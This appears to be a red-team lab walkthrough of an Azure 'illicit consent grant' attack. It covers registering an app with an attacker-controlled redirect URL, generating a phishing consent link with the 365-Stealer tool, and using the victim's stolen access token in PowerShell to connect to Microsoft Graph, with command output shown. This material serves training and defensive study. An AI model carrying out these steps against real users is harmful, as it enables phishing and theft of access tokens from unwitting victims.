Illicit Consent Grant
When we have initial access to a user, we can create a application (this is a default setting).
With this application we can ask another user to consent their permissions to our application. When the user consents, we get their access token. With this access token we can interact with perhaps the Graph API.

Attack
We first go to https://portal.azure.com and register a application from our initial access user. We should use a url that we own as redirect url. So for example https://172.16.10.10/login/authorized. For the permissions, we add User.ReadBasic.All:

Next, we spin up a tool called 365-stealer. Which is a tool created by Altered Security to give a GUI to manage our phishing attack. https://github.com/AlteredSecurity/365-Stealer. This tool allows us to fill in the app's information:

If we save and run the attack, a shell pops up with a phishing link:

We sent this link to the victim. If the victim consents to our application, we receive a update on the GUI:

We can copy the access_token and use that to connect to Microsoft Graph.
PS C:\Windows\system32> $token = 'eY.....'
PS C:\Windows\system32> Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force)
Welcome to Microsoft Graph!
Connected via userprovidedaccesstoken access using bd46fc07-1626-43be-80b7-fkfkfkf
Readme: https://aka.ms/graph/sdk/powershell
SDK Docs: https://aka.ms/graph/sdk/powershell/docs
API Docs: https://aka.ms/graph/docs
NOTE: You can use the -NoWelcome parameter to suppress this message.
PS C:\Windows\system32> Get-MgContext
ClientId : bd46fc07-1626-43be-80b7fgfgfgfgff
TenantId : 2d50cb29-5f7b-48a4-87ceffgffgfgfg
Scopes : {User.Read, User.ReadBasic.All, profile, openid...}
AuthType : UserProvidedAccessToken
TokenCredentialType : UserProvidedAccessToken
CertificateThumbprint :
CertificateSubjectName :
SendCertificateChain : False
Account : [email protected]
AppName : student60
ContextScope : Process
Certificate :
PSHostVersion : 5.1.17763.1490
ManagedIdentityId :
ClientSecret :
Environment : Global
Last updated